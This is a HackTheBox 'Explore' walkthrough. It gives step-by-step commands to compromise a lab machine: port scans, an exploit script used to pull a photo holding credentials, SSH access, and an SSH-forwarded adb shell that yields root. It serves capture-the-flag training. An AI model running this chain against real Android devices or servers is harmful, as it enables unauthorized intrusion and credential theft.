HackTheBox : Explore Walkthrough
Now let’s get acquainted with our site.
The site is not opening. Ok then let’s do a port scan
Command: nmap -p- -T4 10.10.10.247
Now let’s take a closer look at the open ports.
Command: nmap -sC -sV -p 2222,5555,36145,42135,59777 10.10.10.247
We see something different here, let’s investigate immediately and find the appropriate exploit.
I looked at the first site and found the appropriate exploit.
As you can see, it is running on port 59777. When we look at the files here, we see the contents. I know where the file is because I already solved it. But you can have a look if you want.
Let ‘s do it.
Command: python3 50070.py listPics 10.10.10.247
Now let’s download the photo we need and see.
Command: python3 50070.py getFile 10.10.10.247 *******************
Bingo. We found the username and password from the photo.
Now let’s connect with an open ssh port.
Command: ssh *****@10.10.10.247 -p 2222
Check the files, find user.txt and look inside
Findout the user flag and submit to htb.
We saw freeciv at port 5555. If you want to know more, you can do this by searching the Internet. Let’s use it
Download the adb tool first
Command: apt-get install adb
send a port connection to ssh.
Command: ssh -L 5555:localhost:5555 email@example.com -p 2222
İs now ready to connect. Let’s start
Command: adb connect localhost:5555
Check the devices
Command: adb devices
Command: adb -s localhost:5555 shell
And it’s ready. We have gained root power. Find the root.txt and send the root flag.
Get Roota and find the flag.
Findout the root flag and submit to htb.